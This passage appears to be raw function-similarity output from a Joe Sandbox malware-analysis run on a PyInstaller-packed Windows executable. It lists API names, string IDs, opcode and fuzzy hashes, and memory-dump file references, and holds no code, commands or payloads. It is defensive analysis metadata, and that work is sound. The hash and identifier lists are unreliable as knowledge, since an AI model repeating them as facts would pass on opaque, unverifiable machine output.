• API ID: 00007B591
• String ID:
• API String ID: 3188357925-0
• Opcode ID: 873bee83d26bb22448dbf471aac8a50e4fa8fbbbc7f86af2be037ffaac8cadb3
• Instruction ID: d98de50822f4f6c68758788cdb4ef13cf550c9adfdc4593f5201192fef1f7e7a
• Opcode Fuzzy Hash: 873bee83d26bb22448dbf471aac8a50e4fa8fbbbc7f86af2be037ffaac8cadb3
• Instruction Fuzzy Hash: 8E419662A0AB42C2EA568F32E44437963A8FF59B90F484571FD5D07BD4EF3DE446C610

APIs
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: _fread_nolock
• String ID:
• API String ID: 840049012-0
• Opcode ID: 0748e9379ee1a24a6dd361f3a2547f707c71d81643cc4b02aa9d5a9a64da41ab
• Instruction ID: 0d6c5bf25cbbd315964dbcc9a4990ae0d34bc11159dc6c2776a6e7451cc13498
• Opcode Fuzzy Hash: 0748e9379ee1a24a6dd361f3a2547f707c71d81643cc4b02aa9d5a9a64da41ab
• Instruction Fuzzy Hash: 0021E721B5865246FA52BB226D043BAE652FF59BE4FE84434EF0C07B86DE7DE441CB10

APIs
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
• Instruction ID: b3ffcdc2ea8637889cabde6186c1adbce4fd9242ccead691b6bb038f74b24c3b
• Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
• Instruction Fuzzy Hash: 8B313D22A1864285E612BB558C4137CB6A2FFA1BB4FE14239E95D077D2CE7CA4419F21

APIs
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
• Instruction ID: 5b0f5432e87c91338271815ebe442a583a7df5e68f8bee1df1fb53b5ba528f3c
• Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
• Instruction Fuzzy Hash: 20118431A1C64281EA62BF11980117DF672FFA5BA4FE44439EB4C57A96CF3DE4414F60

APIs
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
• Instruction ID: 5c1c71568547bf9acd071346c80e0db66393377e80d0c22d7bd9bb91f2029a27
• Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
• Instruction Fuzzy Hash: 1D210732618A4286DB22AF18D841379B3A2FBA4B70FA44638E75D476D9DF3CD415CF10
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmpDownload File
• Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.1952893577.00007FFBAA4B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFBAA4B0000, based on PE: true
• Associated: 00000008.00000002.1952857331.00007FFBAA4B0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000008.00000002.1952893577.00007FFBAA4D7000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000008.00000002.1953017597.00007FFBAA4D8000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000008.00000002.1953052763.00007FFBAA4DA000.00000004.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa4b0000_program.jbxd
Similarity
• API ID: 00007
• String ID:
• API String ID: 3568877910-0
APIs
  • Part of subcall function 00007FF72C659390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72C6545F4,00000000,00007FF72C651985), ref: 00007FF72C6593C9
• LoadLibraryExW.KERNEL32(?,00007FF72C656476,?,00007FF72C65336E), ref: 00007FF72C658EA2
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: ByteCharLibraryLoadMultiWide
• String ID:
• API String ID: 2592636585-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
• Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: send
• String ID:
• API String ID: 2809346765-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
• Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
• Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                                                  • Opcode ID: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
                                                                                                                                                                                                                                  • Instruction ID: c2b13c29c57f7c45fd851c90f2bed2bb1a2171ce4c8cff3adb160299278bbfc2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4521AEF2E0B25285FB76AE35E8C127922A2EF50F44F288435ED0D46695DF3CE8E1C611
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,00000000,00007FF72C66B32A,?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A), ref: 00007FF72C66EBED
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                                                                  • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                  • Instruction ID: af1b5697a959bb7637e601919f99bef49b76924b6adf7a91745dae5e59c700d1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26F04F58B0928240FE5B76B59D552B4E2A2FFA8B60FEC4538C90F462C1DD1CE4804A30
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,?,00007FF72C660C90,?,?,?,00007FF72C6622FA,?,?,?,?,?,00007FF72C663AE9), ref: 00007FF72C66D63A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                                                                  • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                  • Instruction ID: 3cdae481fe8222b867514f97429f4788fea26aad7f90dec245290c66738413e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7BF0DA50E0924645FE5676725C51675A1A2EFA47B4FA84638DD2E866C2DD2CA4808A30
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                  • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                  • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                  • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                  • Instruction ID: aeca1c47379d912acac750598a1b9216697a077a5fed72815e5a2203fa9fd90c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48D19631A08A8386E711AF34EC552ADB7A2FFA47A8F900635DA5D43A94DF3CD149CB10
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1951835790.00007FFBA66A1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFBA66A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951780580.00007FFBA66A0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66AE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66C1000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952036399.00007FFBA66D1000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952071427.00007FFBA66D3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba66a0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007
                                                                                                                                                                                                                                  • String ID: %X:%X:%X:%X:%X:%X:%X:%X$%d.%d.%d.%d$<INVALID>$<invalid>$DNS$DirName$IP Address$Invalid value %.200s$Registered ID$URI$Unknown general name type %d$email$failed to allocate BIO
                                                                                                                                                                                                                                  • API String ID: 3568877910-4109427827
                                                                                                                                                                                                                                  • Opcode ID: 3a8733b9f8724a0ad4dac92debb2868cdbdf7ad001dd02e936b03acc83697b27
                                                                                                                                                                                                                                  • Instruction ID: 89f261e03de25a7649daa42dd67d51b32bc6a40bb40710381cf89c87622bb45b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a8733b9f8724a0ad4dac92debb2868cdbdf7ad001dd02e936b03acc83697b27
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EFF18FE1A0A68282EA568B39DD642B977B2BFA4F41F446435CE5EC3694DF3CE404DF10
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952893577.00007FFBAA4B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFBAA4B0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952857331.00007FFBAA4B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4D7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953017597.00007FFBAA4D8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953052763.00007FFBAA4DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa4b0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007B591ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2602518146-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.1949490443.00007FFBA4171000.00000040.00000001.01000000.0000001A.sdmp, Offset: 00007FFBA4170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba4170000_program.jbxd
Similarity
• API ID: 00007B591ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 2602518146-0
APIs
• FindFirstFileW.KERNEL32(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C65842B
• RemoveDirectoryW.KERNEL32(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C6584AE
• DeleteFileW.KERNEL32(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C6584CD
• FindNextFileW.KERNEL32(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C6584DB
• FindClose.KERNEL32(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C6584EC
• RemoveDirectoryW.KERNEL32(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C6584F5
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
• String ID: %s\*
• API String ID: 1057558799-766152087
APIs
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.1949877226.00007FFBA43D1000.00000040.00000001.01000000.00000018.sdmp, Offset: 00007FFBA43D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba43d0000_program.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.1951835790.00007FFBA66A1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFBA66A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951780580.00007FFBA66A0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66AE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66C1000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952036399.00007FFBA66D1000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952071427.00007FFBA66D3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba66a0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                                                                                  • Opcode ID: 8e86fcbda8d44a87da12ad3cbe0ff2274eff02410a8037cee209cf92a2e866f6
                                                                                                                                                                                                                                  • Instruction ID: 4670f7950434127426fe264ad413e05b535d2eca140b54fea34bc098eb27c29c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e86fcbda8d44a87da12ad3cbe0ff2274eff02410a8037cee209cf92a2e866f6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06314CB260AB8186EB618F74E8503EE7375FB94B44F04543ADA4E97B94EF38D548CB10
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72C675C45
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C675598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C6755AC
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C66A948: HeapFree.KERNEL32(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A95E
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C66A948: GetLastError.KERNEL32(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A968
